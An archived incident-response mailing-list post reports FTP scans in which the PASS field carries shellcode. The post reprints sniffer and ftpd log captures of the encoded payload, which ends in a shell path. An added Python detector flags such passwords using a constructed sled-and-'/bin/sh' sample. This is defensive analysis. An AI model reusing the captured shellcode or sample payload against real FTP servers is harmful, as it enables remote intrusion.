Security Incidents mailing list archives

New or old FTP exploit?


From: Kent Engström <kent () UNIT LIU SE>
Date: Mon, 7 Aug 2000 19:17:00 +0200

Our /16 has been scanned at least two times from different foreign
addresses during the last weeks with an exploit that seems to be the
same. On both occasions, the connections are to port 21 with the
would-be intruder trying to log in as "USER ftp" and "PASS
long-string-with-nops-and-shellcode-in-it". From one of our users, I
got the following log saved by sniffit:

USER ftp
USER ftp
PASS 
1À1Û1É°F̀1À1ÛC‰ÙA°?̀ëk^1À1ɍ^ˆFf¹ÿÿ°'̀1À^°=̀1À1ۍ^‰C1ÉþÉ1À^°
̀þÉuó1ÀˆF  ^°=̀þ°0þȈF1ÀˆF‰v‰F‰óNV°̀1À1Û°̀èÿÿÿÿÿÿ0bin0sh1..11
PASS 
1À1Û1É°F̀1À1ÛC‰ÙA°?̀ëk^1À1ɍ^ˆFf¹ÿÿ°'̀1À^°=̀1À1ۍ^‰C1ÉþÉ1À^°
̀þÉuó1ÀˆF  ^°=̀þ°0þȈF1ÀˆF‰v‰F‰óNV°̀1À1Û°̀èÿÿÿÿÿÿ0bin0sh1..11

Another user sent me this:

Jul 22 05:47:16 yyyyy ftpd[11650]: ANONYMOUS FTP LOGIN FROM xxxxxxxxxxxxxxxxxxxx [xxx.xxx.xx.xx],
1À1Û1É°F̀1À1ÛC‰ÙA°?̀ëk^1À1ɍ^^AˆF^Df¹ÿ^A°'̀1À^^A°=̀1À1ۍ^^H‰C^B1ÉþÉ1À^^H°^L̀þÉuó1ÀˆF^I^^H°=̀þ^N°0þȈF^D1ÀˆF^G‰v^H‰F^L‰óN^HV^L°^K̀1À1Û°^Àèÿÿÿ0bin0sh1..11
Jul 22 05:47:27 yyyyy ftpd[11650]: FTP session closed Jul 22 07:48:13

Could somebody please tell me if this is an old exploit for some FTP
daemon, or a new exploit?

We have seen attacks coming from:
 200.255.45.90  ppp50.cruiser.com.br
 212.69.228.245 Legend Internet Ltd

--
Kent Engström,          Linköping University Incident Response Team
kent () unit liu se     abuse () liu se
+46 13 28 1744

UNIT, Linköping University; SE-581 83  LINKÖPING; SWEDEN
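The post shows the same pattern in two places: a sniffit capture of the control channel, where the PASS argument is a long binary blob, and an ftpd syslog line that records the anonymous "password" after the client address, with control characters rendered in caret notation (^A, ^H). The detector below is an added example written for this archive page, not code from the original post or from sniffit/ftpd. It scores a PASS argument on length, the share of non-printable bytes, long runs of one filler byte, and the presence of a shell path, and applies the same scoring to both capture forms. The thresholds, the byte sequences in the sample session and the sample syslog line are all constructed for the example, and the caret-notation unescaping is an assumption about how the daemon logged the binary password.

```python
from __future__ import annotations

import re
from typing import Optional

# Thresholds are assumptions chosen for this example, not values from the post.
MAX_PASS_LEN = 64             # longer than any password a person is likely to type
MIN_FILLER_RUN = 8            # a run of one repeated byte this long looks like sled filler
MAX_NONPRINT_FRACTION = 0.10  # passwords are text; a payload is mostly non-printable
# "bin0sh" mirrors how a NUL-separated shell path showed up in the post's capture.
SHELL_MARKERS = (b"/bin/sh", b"bin0sh")

# Constructed FTP control-channel capture: an anonymous login whose PASS argument
# is filler bytes plus a few opaque bytes and a shell path, followed by two normal
# logins. The payload bytes are made up for the example, not the real capture.
SAMPLE_SESSION = (
    b"USER ftp\r\n"
    + b"PASS " + b"\x90" * 80 + b"\x31\xc0\x31\xdb" + b"\x00/bin/sh\x00" + b"\r\n"
    + b"USER alice\r\n"
    + b"PASS correct horse battery staple\r\n"
    + b"USER anonymous\r\n"
    + b"PASS guest@example.org\r\n"
)

# Constructed ftpd syslog line in the shape the post shows, with the logged
# "password" written in caret notation (^P = byte 0x10) plus a raw high byte.
SAMPLE_SYSLOG = (
    b"Jul 22 05:47:16 ftphost ftpd[4242]: ANONYMOUS FTP LOGIN FROM client.example [192.0.2.10], "
    + b"^P" * 20 + b"1\xc0^A^H/bin/sh"
)

_CARET = re.compile(rb"\^([@A-Z\[\\\]^_])")
_FTPD_ANON = re.compile(rb"ftpd\[\d+\]: ANONYMOUS FTP LOGIN FROM (\S+) \[([^\]]+)\], (.*)$")


def unescape_caret(text: bytes) -> bytes:
    """Turn syslog caret notation (^A, ^H, ...) back into the control bytes it stands for."""
    return _CARET.sub(lambda m: bytes([m.group(1)[0] - 64]), text)


def score_pass(arg: bytes) -> list[str]:
    """Return the reasons a PASS argument looks like a payload rather than a password."""
    reasons = []
    if len(arg) > MAX_PASS_LEN:
        reasons.append(f"length {len(arg)} > {MAX_PASS_LEN}")
    nonprint = sum(1 for b in arg if b < 0x20 or b > 0x7E)
    if arg and nonprint / len(arg) > MAX_NONPRINT_FRACTION:
        reasons.append(f"{nonprint} non-printable bytes")
    run = re.search(rb"(.)\1{%d,}" % (MIN_FILLER_RUN - 1), arg, re.DOTALL)
    if run:
        reasons.append(f"run of {len(run.group(0))} x 0x{run.group(1)[0]:02x}")
    for marker in SHELL_MARKERS:
        if marker in arg:
            reasons.append(f"contains {marker!r}")
    return reasons


def split_commands(stream: bytes) -> list[tuple[bytes, bytes]]:
    """Split a captured control channel on the CRLF the FTP client sends into (verb, argument)."""
    cmds = []
    for line in stream.split(b"\r\n"):
        if not line:
            continue
        verb, _, arg = line.partition(b" ")
        cmds.append((verb.upper(), arg))
    return cmds


def scan_session(stream: bytes) -> list[dict]:
    """Flag each suspicious PASS in a capture, keeping the preceding USER for context."""
    alerts = []
    user = None
    for verb, arg in split_commands(stream):
        if verb == b"USER":
            user = arg
        elif verb == b"PASS":
            reasons = score_pass(arg)
            if reasons:
                alerts.append({"user": user, "length": len(arg), "reasons": reasons})
    return alerts


def scan_syslog_line(line: bytes) -> Optional[dict]:
    """Apply the same scoring to an ftpd ANONYMOUS FTP LOGIN line, after undoing caret notation."""
    m = _FTPD_ANON.search(line)
    if not m:
        return None
    host, addr, password = m.groups()
    reasons = score_pass(unescape_caret(password))
    if not reasons:
        return None
    return {"host": host, "addr": addr, "reasons": reasons}


if __name__ == "__main__":
    for alert in scan_session(SAMPLE_SESSION):
        print("suspicious PASS after USER", alert["user"], alert["reasons"])
    print(scan_syslog_line(SAMPLE_SYSLOG))
```

Splitting the capture on CRLF assumes the payload itself contains no CRLF; a payload that does would be cut into two bogus commands, which is a limitation to keep in mind when running this over real sniffer output. The caret unescaping will also mangle a legitimate password that literally contains "^A", so treat the syslog path as a triage aid rather than an exact decoder.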

